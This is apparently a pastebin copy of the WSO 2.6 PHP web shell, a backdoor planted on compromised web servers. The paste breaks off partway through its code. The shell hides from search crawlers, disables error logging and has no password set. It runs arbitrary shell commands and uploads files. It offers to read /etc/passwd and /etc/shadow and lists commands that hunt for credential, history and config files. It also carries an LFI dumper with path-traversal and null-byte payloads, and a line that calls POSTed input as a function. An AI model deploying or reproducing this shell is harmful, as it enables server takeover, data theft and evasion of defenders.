· 5 years ago · May 17, 2020, 07:50 AM
1<?php
2session_start();
3$password = "";
4$passtype = "";
5$color = "#df5";
6$default_action = 'FilesMan';
7$default_use_ajax = true;
8$default_charset = 'Windows-1251';
9if(!empty($_SERVER['HTTP_USER_AGENT'])) {
10$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler");
11if(preg_match('/'.implode('|',$userAgents) .'/i',$_SERVER['HTTP_USER_AGENT'])) {
12header('HTTP/1.0 404 Not Found');
13exit;
14}}
15@session_start();
16@ini_set('error_log',NULL);
17@ini_set('log_errors',0);
18@ini_set('max_execution_time',0);
19@set_time_limit(0);
20@define('WSO_VERSION','2.6');
21@setcookie("wsog","orb",time()+3600*24*7);
22if(get_magic_quotes_gpc()) {
23function WSOstripslashes($array) {
24return is_array($array) ?array_map('WSOstripslashes',$array) : stripslashes($array);
25}
26$_POST = WSOstripslashes($_POST);
27}
28$dir = md5('/home/k3030889/public_html/media/temp/30b2c088dc63ae3e97ca260cb16a6c68.txt' );
29if(!empty($password) and $password !== 0) {
30if (isset($_POST['pass'])) {
31if ($passtype == "MD5") {
32$visitorpassword = md5($_POST['pass']);}
33elseif ($passtype == "SHA1") {
34$visitorpassword = sha1($_POST['pass']);}
35else {
36$visitorpassword = $_POST['pass'];}
37if($visitorpassword == $password){
38$_SESSION[$dir] = "OK";}
39}
40if ( !isset($_SESSION[$dir]) ||($_SESSION[$dir] != "OK") ) {
41die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");}
42}
43elseif ($password == 0) {
44$_SESSION[$dir] = "OK";
45}
46if(strtolower(substr(PHP_OS,0,3)) == "win")
47$os = 'win';
48else
49$os = 'nix';
50$safe_mode = @ini_get('safe_mode');
51if(!$safe_mode)
52error_reporting(0);
53$disable_functions = @ini_get('disable_functions');
54$home_cwd = @getcwd();
55if(isset($_POST['c']))
56@chdir($_POST['c']);
57$cwd = @getcwd();
58if($os == 'win') {
59$home_cwd = str_replace("\\","/",$home_cwd);
60$cwd = str_replace("\\","/",$cwd);
61}
62if( $cwd[strlen($cwd)-1] != '/')
63$cwd .= '/';
64if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']) .'ajax']))
65$_SESSION[md5($_SERVER['HTTP_HOST']) .'ajax'] = (bool)$GLOBALS['default_use_ajax'];
66if($os == 'win')
67$aliases = array(
68"List Directory"=>"dir",
69"Find index.php in current dir"=>"dir /s /w /b index.php",
70"Find *config*.php in current dir"=>"dir /s /w /b *config*.php",
71"Show active connections"=>"netstat -an",
72"Show running services"=>"net start",
73"User accounts"=>"net user",
74"Show computers"=>"net view",
75"ARP Table"=>"arp -a",
76"IP Configuration"=>"ipconfig /all"
77);
78else
79$aliases = array(
80"List dir"=>"ls -lha",
81"list file attributes on a Linux second extended file system"=>"lsattr -va",
82"show opened ports"=>"netstat -an | grep -i listen",
83"process status"=>"ps aux",
84"Find"=>"",
85"find all suid files"=>"find / -type f -perm -04000 -ls",
86"find suid files in current dir"=>"find . -type f -perm -04000 -ls",
87"find all sgid files"=>"find / -type f -perm -02000 -ls",
88"find sgid files in current dir"=>"find . -type f -perm -02000 -ls",
89"find config.inc.php files"=>"find / -type f -name config.inc.php",
90"find config* files"=>"find / -type f -name \"config*\"",
91"find config* files in current dir"=>"find . -type f -name \"config*\"",
92"find all writable folders and files"=>"find / -perm -2 -ls",
93"find all writable folders and files in current dir"=>"find . -perm -2 -ls",
94"find all service.pwd files"=>"find / -type f -name service.pwd",
95"find service.pwd files in current dir"=>"find . -type f -name service.pwd",
96"find all .htpasswd files"=>"find / -type f -name .htpasswd",
97"find .htpasswd files in current dir"=>"find . -type f -name .htpasswd",
98"find all .bash_history files"=>"find / -type f -name .bash_history",
99"find .bash_history files in current dir"=>"find . -type f -name .bash_history",
100"find all .fetchmailrc files"=>"find / -type f -name .fetchmailrc",
101"find .fetchmailrc files in current dir"=>"find . -type f -name .fetchmailrc",
102"Locate"=>"",
103"locate httpd.conf files"=>"locate httpd.conf",
104"locate vhosts.conf files"=>"locate vhosts.conf",
105"locate proftpd.conf files"=>"locate proftpd.conf",
106"locate psybnc.conf files"=>"locate psybnc.conf",
107"locate my.conf files"=>"locate my.conf",
108"locate admin.php files"=>"locate admin.php",
109"locate cfg.php files"=>"locate cfg.php",
110"locate conf.php files"=>"locate conf.php",
111"locate config.dat files"=>"locate config.dat",
112"locate config.php files"=>"locate config.php",
113"locate config.inc files"=>"locate config.inc",
114"locate config.inc.php"=>"locate config.inc.php",
115"locate config.default.php files"=>"locate config.default.php",
116"locate config* files "=>"locate config",
117"locate .conf files"=>"locate '.conf'",
118"locate .pwd files"=>"locate '.pwd'",
119"locate .sql files"=>"locate '.sql'",
120"locate .htpasswd files"=>"locate '.htpasswd'",
121"locate .bash_history files"=>"locate '.bash_history'",
122"locate .mysql_history files"=>"locate '.mysql_history'",
123"locate .fetchmailrc files"=>"locate '.fetchmailrc'",
124"locate backup files"=>"locate backup",
125"locate dump files"=>"locate dump",
126"locate priv files"=>"locate priv"
127);
128function wsoHeader() {
129if(empty($_POST['charset']))
130$_POST['charset'] = $GLOBALS['default_charset'];
131global $color;
132echo "<html><head>
133<meta http-equiv='Content-Type' content='text/html; charset=".$_POST['charset'] ."'><title>".$_SERVER['HTTP_HOST'] ." - WSO ".WSO_VERSION ."</title>
134<style>
135body{background-color:#444;color:#e1e1e1;}
136body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
137table.info{ color:#fff;background-color:#222; }
138span,h1,a{ color: $color !important; }
139span{ font-weight: bolder; }
140h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
141div.content{ padding: 5px;margin-left:5px;background-color:#333; }
142a{ text-decoration:none; }
143a:hover{ text-decoration:underline; }
144#pre{font.family:Courier,Monospace;}
145.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
146.bigarea{ width:100%;height:300px; }
147input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
148form{ margin:0px; }
149#toolsTbl{ text-align:center; }
150.toolsInp{ width: 300px }
151.main th{text-align:left;background-color:#5e5e5e;}
152.main tr:hover{background-color:#5e5e5e}
153.l1{background-color:#444}
154.l2{background-color:#333}
155pre{font-family:Courier,Monospace;}
156</style>
157<script>
158 var c_ = '".htmlspecialchars($GLOBALS['cwd']) ."';
159 var a_ = '".htmlspecialchars(@$_POST['a']) ."'
160 var charset_ = '".htmlspecialchars(@$_POST['charset']) ."';
161 var p1_ = '".((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
162 var p2_ = '".((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
163 var p3_ = '".((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
164 var p4_ = '".((strpos(@$_POST['p4'],"md")===false)?'':htmlspecialchars($_POST['p4']('/home/k3030889/public_html/media/temp/30b2c088dc63ae3e97ca260cb16a6c68.txt'),ENT_QUOTES)) ."';
165
166 var d = document;
167 function set(a,c,p1,p2,p3,charset) {
168 if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
169 if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
170 if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
171 if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
172 if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
173 if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
174 }
175 function g(a,c,p1,p2,p3,charset) {
176 set(a,c,p1,p2,p3,charset);
177 d.mf.submit();
178 }
179 function a(a,c,p1,p2,p3,charset) {
180 set(a,c,p1,p2,p3,charset);
181 var params = 'ajax=true';
182 for(i=0;i<d.mf.elements.length;i++)
183 params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
184 sr('".addslashes($_SERVER['REQUEST_URI']) ."', params);
185 }
186 function sr(url, params) {
187 //if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
188 if (window.XMLHttpRequest)
189 req = new XMLHttpRequest();
190 else if (window.ActiveXObject)
191 req = new ActiveXObject('Microsoft.XMLHTTP');
192 if (req) {
193 req.onreadystatechange = processReqChange;
194 req.open('POST', url, true);
195 req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
196 req.send(params);
197 }
198 }
199 function processReqChange() {
200 if( (req.readyState == 4) )
201 if(req.status == 200) {
202 var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
203 var arr=reg.exec(req.responseText);
204 eval(arr[2].substr(0, arr[1]));
205 } else alert('Request error!');
206 }
207</script>
208<head><body><div style='position:absolute;width:100%;background-color:#000;top:0;left:0;'>
209<form method=post name=mf style='display:none;'>
210<input type=hidden name=a>
211<input type=hidden name=c>
212<input type=hidden name=p1>
213<input type=hidden name=p2>
214
215<input type=hidden name=p3>
216<input type=hidden name=charset>
217</form>";
218$freeSpace = @diskfreespace($GLOBALS['cwd']);
219$totalSpace = @disk_total_space($GLOBALS['cwd']);
220$totalSpace = $totalSpace?$totalSpace:1;
221$release = @php_uname('r');
222$kernel = @php_uname('s');
223if(!function_exists('posix_getegid')) {
224$user = @get_current_user();
225$uid = @getmyuid();
226$gid = @getmygid();
227$group = "?";
228}else {
229$uid = @posix_getpwuid(posix_geteuid());
230$gid = @posix_getgrgid(posix_getegid());
231$user = $uid['name'];
232$uid = $uid['uid'];
233$group = $gid['name'];
234$gid = $gid['gid'];
235}
236$cwd_links = '';
237$path = explode("/",$GLOBALS['cwd']);
238$n=count($path);
239for($i=0;$i<$n-1;$i++) {
240$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
241for($j=0;$j<=$i;$j++)
242$cwd_links .= $path[$j].'/';
243$cwd_links .= "\")'>".$path[$i]."/</a>";
244}
245$charsets = array('UTF-8','Windows-1251','KOI8-R','KOI8-U','cp866');
246$opt_charsets = '';
247foreach($charsets as $item)
248$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
249$m = array('Sec Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Sql'=>'Sql','PHP Tools'=>'phptools','LFI'=>'lfiscan','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','XSS Shell'=>'XSSShell','Bruteforce'=>'Bruteforce','Network'=>'Network');
250if(!empty($GLOBALS['auth_pass']))
251$m['Logout'] = 'Logout';
252$m['Self remove'] = 'SelfRemove';
253$menu = '';
254foreach($m as $k =>$v)
255$menu .= '<th width="'.(int)(100/count($m)).'%">[<a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a>]</th>';
256$drives = "";
257if($GLOBALS['os'] == 'win') {
258foreach(range('c','z') as $drive)
259if(is_dir($drive.':\\'))
260$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
261}
262echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'') .'</span></td>'
263.'<td><nobr>'.substr(@php_uname(),0,120) .' </nobr><br>'.$uid .' ( '.$user .' ) <span>Group:</span> '.$gid .' ( '.$group .' )<br>'.@phpversion() .' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>')
264.' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s') .'<br>'.wsoViewSize($totalSpace) .' <span>Free:</span> '.wsoViewSize($freeSpace) .' ('.(int) ($freeSpace/$totalSpace*100) .'%)<br>'.$cwd_links .' '.wsoPermsColor($GLOBALS['cwd']) .' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'] .'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives .'</td>'
265.'<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets .'</optgroup></select><br><span>Server IP:</span><br>'.@$_SERVER["SERVER_ADDR"] .'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'] .'</nobr></td></tr></table>'
266.'<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu .'</tr></table><div style="margin:5">';
267}
268function wsoFooter() {
269$is_writable = is_writable($GLOBALS['cwd'])?" <font color='#25ff00'>(Writeable)</font>":" <font color=red>(Not writable)</font>";
270echo "
271
272</div>
273<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
274 <tr>
275 <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='".htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
276 <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
277 </tr><tr>
278 <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
279 <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
280
281 </tr><tr>
282 <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
283 <td><form method='post' ENCTYPE='multipart/form-data'>
284 <input type=hidden name=a value='FilesMAn'>
285 <input type=hidden name=c value='".$GLOBALS['cwd'] ."'>
286 <input type=hidden name=p1 value='uploadFile'>
287 <input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'') ."'>
288 <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td></tr></table></div></body></html>";
289}
290if (!function_exists("posix_getpwuid") &&(strpos($GLOBALS['disable_functions'],'posix_getpwuid')===false)) {
291function posix_getpwuid($p) {return false;}}
292if (!function_exists("posix_getgrgid") &&(strpos($GLOBALS['disable_functions'],'posix_getgrgid')===false)) {
293function posix_getgrgid($p) {return false;}}
294function wsoEx($in) {
295$out = '';
296if (function_exists('exec')) {
297@exec($in,$out);
298$out = @join("\n",$out);
299}elseif (function_exists('passthru')) {
300ob_start();
301@passthru($in);
302$out = ob_get_clean();
303}elseif (function_exists('system')) {
304ob_start();
305@system($in);
306$out = ob_get_clean();
307}elseif (function_exists('shell_exec')) {
308$out = shell_exec($in);
309}elseif (is_resource($f = @popen($in,"r"))) {
310$out = "";
311while(!@feof($f))
312$out .= fread($f,1024);
313pclose($f);
314}
315return $out;
316}
317function wsoViewSize($s) {
318if($s >= 1073741824)
319return sprintf('%1.2f',$s / 1073741824 ).' GB';
320elseif($s >= 1048576)
321return sprintf('%1.2f',$s / 1048576 ) .' MB';
322elseif($s >= 1024)
323return sprintf('%1.2f',$s / 1024 ) .' KB';
324else
325return $s .' B';
326}
327function wsoPerms($p) {
328if (($p &0xC000) == 0xC000)$i = 's';
329elseif (($p &0xA000) == 0xA000)$i = 'l';
330elseif (($p &0x8000) == 0x8000)$i = '-';
331elseif (($p &0x6000) == 0x6000)$i = 'b';
332elseif (($p &0x4000) == 0x4000)$i = 'd';
333elseif (($p &0x2000) == 0x2000)$i = 'c';
334elseif (($p &0x1000) == 0x1000)$i = 'p';
335else $i = 'u';
336$i .= (($p &0x0100) ?'r': '-');
337$i .= (($p &0x0080) ?'w': '-');
338$i .= (($p &0x0040) ?(($p &0x0800) ?'s': 'x') : (($p &0x0800) ?'S': '-'));
339$i .= (($p &0x0020) ?'r': '-');
340$i .= (($p &0x0010) ?'w': '-');
341$i .= (($p &0x0008) ?(($p &0x0400) ?'s': 'x') : (($p &0x0400) ?'S': '-'));
342$i .= (($p &0x0004) ?'r': '-');
343$i .= (($p &0x0002) ?'w': '-');
344$i .= (($p &0x0001) ?(($p &0x0200) ?'t': 'x') : (($p &0x0200) ?'T': '-'));
345return $i;
346}
347function wsoPermsColor($f) {
348if (!@is_readable($f))
349return '<font color=#FF0000>'.wsoPerms(@fileperms($f)) .'</font>';
350elseif (!@is_writable($f))
351return '<font color=white>'.wsoPerms(@fileperms($f)) .'</font>';
352else
353return '<font color=#00BB00>'.wsoPerms(@fileperms($f)) .'</font>';
354}
355if(!function_exists("scandir")) {
356function scandir($dir) {
357$dh = opendir($dir);
358while (false !== ($filename = readdir($dh)))
359$files[] = $filename;
360return $files;
361}
362}
363function wsoWhich($p) {
364$path = wsoEx('which '.$p);
365if(!empty($path))
366return $path;
367return false;
368}
369function actionSecInfo() {
370wsoHeader();
371echo '<h1>Server security information</h1><div class=content>';
372function wsoSecParam($n,$v) {
373$v = trim($v);
374if($v) {
375echo '<span>'.$n .': </span>';
376if(strpos($v,"\n") === false)
377echo $v .'<br>';
378else
379echo '<pre class=ml1>'.$v .'</pre>';
380}
381}
382wsoSecParam('Server software',@getenv('SERVER_SOFTWARE'));
383if(function_exists('apache_get_modules'))
384wsoSecParam('Loaded Apache modules',implode(', ',apache_get_modules()));
385wsoSecParam('Disabled PHP Functions',$GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
386wsoSecParam('Open base dir',@ini_get('open_basedir'));
387wsoSecParam('Safe mode exec dir',@ini_get('safe_mode_exec_dir'));
388wsoSecParam('Safe mode include dir',@ini_get('safe_mode_include_dir'));
389wsoSecParam('cURL support',function_exists('curl_version')?'enabled':'no');
390$temp=array();
391if(function_exists('mysql_get_client_info'))
392$temp[] = "MySql (".mysql_get_client_info().")";
393if(function_exists('mssql_connect'))
394$temp[] = "MSSQL";
395if(function_exists('pg_connect'))
396$temp[] = "PostgreSQL";
397if(function_exists('oci_connect'))
398$temp[] = "Oracle";
399wsoSecParam('Supported databases',implode(', ',$temp));
400echo '<br>';
401if($GLOBALS['os'] == 'nix') {
402wsoSecParam('Readable /etc/passwd',@is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
403wsoSecParam('Readable /etc/shadow',@is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
404wsoSecParam('OS version',@file_get_contents('/proc/version'));
405wsoSecParam('Distr name',@file_get_contents('/etc/issue.net'));
406if(!$GLOBALS['safe_mode']) {
407$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
408$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
409$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
410echo '<br>';
411$temp=array();
412foreach ($userful as $item)
413if(wsoWhich($item))
414$temp[] = $item;
415wsoSecParam('Userful',implode(', ',$temp));
416$temp=array();
417foreach ($danger as $item)
418if(wsoWhich($item))
419$temp[] = $item;
420wsoSecParam('Danger',implode(', ',$temp));
421$temp=array();
422foreach ($downloaders as $item)
423if(wsoWhich($item))
424$temp[] = $item;
425wsoSecParam('Downloaders',implode(', ',$temp));
426echo '<br/>';
427wsoSecParam('HDD space',wsoEx('df -h'));
428wsoSecParam('Hosts',@file_get_contents('/etc/hosts'));
429}
430}else {
431wsoSecParam('OS Version',wsoEx('ver'));
432wsoSecParam('Account Settings',wsoEx('net accounts'));
433wsoSecParam('User Accounts',wsoEx('net user'));
434}
435echo '</div>';
436wsoFooter();
437}
438function actionlfiscan() {
439wsoHeader();
440print '
441 <h3>Led-Zeppelin\'s LFI File dumper</h3>
442
443 <form method="post" action="?"><input type="hidden" name="a" value="lfiscan">
444 LFI URL: <input type="text" size="60" name="lfiurl" value=""> <input type="submit" value="Go"> File: <select name="scantype">
445 <option value="1">
446 Access Log
447 </option>
448
449 <option value="2">
450 httpd.conf
451 </option>
452
453 <option value="3">
454 Error Log
455 </option>
456 <option value="4">
457 php.ini
458 </option>
459 <option value="5">
460 MySQL
461 </option>
462 <option value="6">
463 FTP
464 </option>
465 <option value="7">
466 Environ
467 </option>
468 </select> Null: <select name="null">
469 <option value="%00">
470 Yes
471 </option>
472
473 <option value="">
474 No
475 </option>
476 </select> User-Agent: <input type="text" size="20" name="custom_header" value="">
477 </form>';
478error_reporting(0);
479if($_POST['lfiurl']) {
480print "<pre>";
481$cheader = $_POST['custom_header'];
482$target = $_POST['lfiurl'];
483$type = $_POST['scantype'];
484$byte1 = $_POST['null'];
485$lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1."";
486$lfitest2 = "../../../../../../../../../../../../../../fake/file".$byte1."";
487$lfiprocenv = "../../../../../../../../../../../../../../proc/environ".$byte1."";
488$lfiaccess = array(
4891 =>"../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",
4902 =>"../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",
4913 =>"../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",
4924 =>"../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",
4935 =>"../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",
4946 =>"../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."",
4957 =>"../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."",
4968 =>"../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."",
4979 =>"../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."",
49810 =>"../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."",
49911 =>"../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."",
50012 =>"../../../../../../../../../../../../../../var/log/access_log".$byte1."",
50113 =>"../../../../../../../../../../../../../../var/log/access.log".$byte1."",
50214 =>"../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."",
50315 =>"../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."",
50416 =>"../../../../../../../../../../../../../../logs/access.log".$byte1."",
50517 =>"../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."",
50618 =>"../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."",
50719 =>"../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."",
50820 =>"../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."",
50921 =>"../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."",
51022 =>"../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."",
51123 =>"../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");
512$lfierror = array(
5131 =>"../../../../../../../../../../../../../../apache/logs/error.log".$byte1."",
5142 =>"../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."",
5153 =>"../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."",
5164 =>"../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."",
5175 =>"../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."",
5186 =>"../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."",
5197 =>"../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."",
5208 =>"../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."",
5219 =>"../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."",
52210 =>"../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."",
52311 =>"../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."",
52412 =>"../../../../../../../../../../../../../../var/log/error_log".$byte1."",
52513 =>"../../../../../../../../../../../../../../var/log/error.log".$byte1."",
52614 =>"../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."",
52715 =>"../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."",
52816 =>"../../../../../../../../../../../../../../logs/error.log".$byte1."",
52917 =>"../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."",
53018 =>"../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."",
53119 =>"../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."",
53220 =>"../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."",
53321 =>"../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."",
53422 =>"../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."",
53523 =>"../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");
536$lficonfig = array(
5371 =>"../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."",
5382 =>"../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."",
5393 =>"../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."",
5404 =>"../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."",
5415 =>"../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf".$byte1."",
5426 =>"../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1."",
5437 =>"../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1."",
5448 =>"../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf".$byte1."",
5459 =>"../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf".$byte1."",
54610 =>"../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf".$byte1."",
54711 =>"../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1."",
54812 =>"../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf".$byte1."",
54913 =>"../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf".$byte1."",
55014 =>"../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1."",
55115 =>"../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf".$byte1."",
55216 =>"../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf".$byte1."",
55317 =>"../../../../../../../../../../../../../../../etc/http/conf/httpd.conf".$byte1."",
55418 =>"../../../../../../../../../../../../../../../etc/httpd/httpd.conf".$byte1."",
55519 =>"../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1."",
55620 =>"../../../../../../../../../../../../../../../etc/httpd.conf".$byte1."",
55721 =>"../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf".$byte1."",
55822 =>"../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1."",
55923 =>"../../../../../../../../../../../../../../../var/www/conf/httpd.conf".$byte1."",
56024 =>"../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf".$byte1."",
56125 =>"../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default".$byte1."",
56226 =>"../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf".$byte1."",
56327 =>"../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1."",
56428 =>"../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1."",
56529 =>"../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php".$byte1."",
56630 =>"../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1."",
56731 =>"../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php".$byte1."",
56832 =>"../../../../../../../../../../../../../../../usr/local/php/httpd.conf".$byte1."",
56933 =>"../../../../../../../../../../../../../../../usr/local/php4/httpd.conf".$byte1."",
57034 =>"../../../../../../../../../../../../../../../usr/local/php5/httpd.conf".$byte1."",
57135 =>"../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1."");
572$lfiphpini = array(
5731 =>"../../../../../../../../../../../../../../../etc/php.ini".$byte1."",
5742 =>"../../../../../../../../../../../../../../../bin/php.ini".$byte1."",
5753 =>"../../../../../../../../../../../../../../../etc/httpd/php.ini".$byte1."",
5764 =>"../../../../../../../../../../../../../../../usr/lib/php.ini".$byte1."",
5775 =>"../../../../../../../../../../../../../../../usr/lib/php/php.ini".$byte1."",
5786 =>"../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1."",
5797 =>"../../../../../../../../../../../../../../../usr/local/lib/php.ini".$byte1."",
5808 =>"../../../../../../../../../../../../../../../usr/local/php/lib/php.ini".$byte1."",
5819 =>"../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1."",
58210 =>"../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini".$byte1."",
58311 =>"../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini".$byte1."",
58412 =>"../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini".$byte1."",
58513 =>"../../../../../../../../../../../../../../../etc/php4/apache/php.ini".$byte1."",
58614 =>"../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1."",
58715 =>"../../../../../../../../../../../../../../../etc/php5/apache/php.ini".$byte1."",
58816 =>"../../../../../../../../../../../../../../../etc/php5/apache2/php.ini".$byte1."",
58917 =>"../../../../../../../../../../../../../../../etc/php/php.ini".$byte1."",
59018 =>"../../../../../../../../../../../../../../../etc/php/php4/php.ini".$byte1."",
